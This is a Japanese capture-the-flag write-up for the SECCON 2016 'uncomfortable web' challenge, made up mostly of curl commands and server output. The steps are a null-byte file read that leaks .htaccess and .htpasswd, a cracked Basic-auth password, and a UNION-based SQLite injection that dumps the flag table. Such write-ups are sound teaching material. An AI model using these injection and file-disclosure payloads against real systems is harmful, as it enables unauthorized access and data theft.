--- lang: ja-jp breaks: true --- uncomfortable web === ## 問題概要 ### ジャンル Web ### 点数 300 points ### 問題文 uncomfortable web Attack to http://127.0.0.1:81/authed/ through the uploaded script at http://uncomfortableweb.pwn.seccon.jp/. Get the flag in the database! ### フラグ `SECCON{I want to eventually make a CGC web edition... someday...}` ### 挑戦者 mzyy94 ww24 ## 解法 `http://127.0.0.1:81/select.cgi?txt=`に続ける文字列に.txtを追加したのがレスポンスとして帰ってくる。 で、追加されるはずの.txtを無視するために、%00でNULL抜けさせる。 ```bash #!/bin/sh curl "http://127.0.0.1:81/select.cgi?txt=.htaccess%00%00" curl "http://127.0.0.1:81/select.cgi?txt=.htpasswd%00%00" ``` #### .htaccess ```htmlmixed <html> <body> <form action="?" method="get"> <select name="txt"> <option value="a">a</option> <option value="b">b</option> </select> <input type="submit" vaue="GO"> </form> <hr> AuthUserFile /var/www/html-inner/authed/.htpasswd<br> AuthGroupFile /dev/null<br> AuthName &quot;SECCON 2016&quot;<br> AuthType Basic<br> Require user keigo<br> </body></html> ``` #### .htpasswd ```html <html> <body> <form action="?" method="get"> <select name="txt"> <option value="a">a</option> <option value="b">b</option> </select> <input type="submit" vaue="GO"> </form> <hr> keigo:LdnoMJCeVy.SE<br> </body></html> ``` このhtpasswdを逆ハッシュすると`keigo:test`なのでBasic認証する。 すると100のCGIファイルが出てくる。 ```bash #!/bin/sh for i in $(seq 1 100); do curl -u keigo:test "http://127.0.0.1:81/authed/sqlinj/$i.cgi?no=4822267938" 2> /dev/null done ``` no=パラメタにたいしてSQLiするようだ。 `72.cgi` があやしい。 ``` > GET /authed/sqlinj/72.cgi?no=4822267938'+OR+'1'='1 HTTP/1.1 > Authorization: Basic a2VpZ286dGVzdA== > User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.21 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2 > Host: 127.0.0.1:81 > Accept: */* > < HTTP/1.1 200 OK < Date: Sat, 10 Dec 2016 15:29:22 GMT < Server: Apache < Connection: close < Transfer-Encoding: chunked < Content-Type: text/html; charset=utf-8 < { [data not shown] * Closing connection #0 <html> <head> <title>SECCON 2016 Online</title> <!-- by KeigoYAMAZAKI, 2016.11.08- --> </head> <body> <a href="?no=4822267938">link</a> <hr> ISBN-10: 4822267865<br> ISBN-13: 978-4822267865<br> PUBLISH: 2015/2/20<p> ISBN-10: 4822267911<br> ISBN-13: 978-4822267919<br> PUBLISH: 2015/8/27<p> ISBN-10: 4822267938<br> ISBN-13: 978-4822267933<br> PUBLISH: 2016/2/19<p> ISBN-10: 4822237842<br> ISBN-13: 978-4822237844<br> PUBLISH: 2016/8/25<p> </body></html> ``` RDBMS は sqlite 3.6.20 ```bash curl -svu keigo:test "http://127.0.0.1:81/authed/sqlinj/72.cgi?no='OR'1'+UNION+SELECT+'a','b',sqlite_version()--" ``` とりあえずテーブル一覧。 ``` curl -u keigo:test "http://127.0.0.1:81/authed/sqlinj/72.cgi?no='OR+1=1+UNION+SELECT+type,name,sql+FROM+sqlite_master+WHERE+type='table'--" 2>/dev/null ``` ```htmlmixed= <html> <head> <title>SECCON 2016 Online</title> <!-- by KeigoYAMAZAKI, 2016.11.08- --> </head> <body> <a href="?no=4822267938">link</a> <hr> ISBN-10: 4822237842<br> ISBN-13: 978-4822237844<br> PUBLISH: 2016/8/25<p> ISBN-10: 4822267865<br> ISBN-13: 978-4822267865<br> PUBLISH: 2015/2/20<p> ISBN-10: 4822267911<br> ISBN-13: 978-4822267919<br> PUBLISH: 2015/8/27<p> ISBN-10: 4822267938<br> ISBN-13: 978-4822267933<br> PUBLISH: 2016/2/19<p> ISBN-10: table<br> ISBN-13: books<br> PUBLISH: CREATE TABLE books (isbn10,isbn13,date)<p> ISBN-10: table<br> ISBN-13: f1ags<br> PUBLISH: CREATE TABLE f1ags (f1ag)<p> </body></html> ``` フラグゲット ``` curl -u keigo:test "http://127.0.0.1:81/authed/sqlinj/72.cgi?no='OR+1=1+UNION+SELECT+f1ag,f1ag,f1ag+FROM+f1ags--" 2>/dev/null ``` ```htmlmixed= <html> <head> <title>SECCON 2016 Online</title> <!-- by KeigoYAMAZAKI, 2016.11.08- --> </head> <body> <a href="?no=4822267938">link</a> <hr> ISBN-10: 4822237842<br> ISBN-13: 978-4822237844<br> PUBLISH: 2016/8/25<p> ISBN-10: 4822267865<br> ISBN-13: 978-4822267865<br> PUBLISH: 2015/2/20<p> ISBN-10: 4822267911<br> ISBN-13: 978-4822267919<br> PUBLISH: 2015/8/27<p> ISBN-10: 4822267938<br> ISBN-13: 978-4822267933<br> PUBLISH: 2016/2/19<p> ISBN-10: SECCON{I want to eventually make a CGC web edition... someday...}<br> ISBN-13: SECCON{I want to eventually make a CGC web edition... someday...}<br> PUBLISH: SECCON{I want to eventually make a CGC web edition... someday...}<p> </body></html> ``` ## 議論 とりあえずアクセスできるURL ```bash #!/bin/bash curl "http://127.0.0.1:81/select.cgi?txt=a" # a.txt curl "http://127.0.0.1:81/select.cgi?txt=b" # b.txt curl "http://127.0.0.1:81/select.cgi?txt=c" # c.txt curl "http://127.0.0.1:81/select.cgi?txt=a;hogehoge" # a.txt curl "http://127.0.0.1:81/select.cgi?txt=..//././a" # a.txt curl "http://127.0.0.1:81/select.cgi?txt=/hoge/a;fuga" # a.txt ``` 最後の「/」以降で「;」までの文字列に.txtを追加したものがファイルとして読み込まれる様子。 /authed/index.cgiが取得できればなー ![実行制限](https://i.imgur.com/WgvgYQW.png) `http://127.0.0.1:81/authed/a.txt` は 401 ``` < HTTP/1.1 401 Authorization Required < Date: Sat, 10 Dec 2016 14:30:51 GMT < Server: Apache < WWW-Authenticate: Basic realm="SECCON 2016" < Content-Length: 460 < Connection: close < Content-Type: text/html; charset=iso-8859-1 ```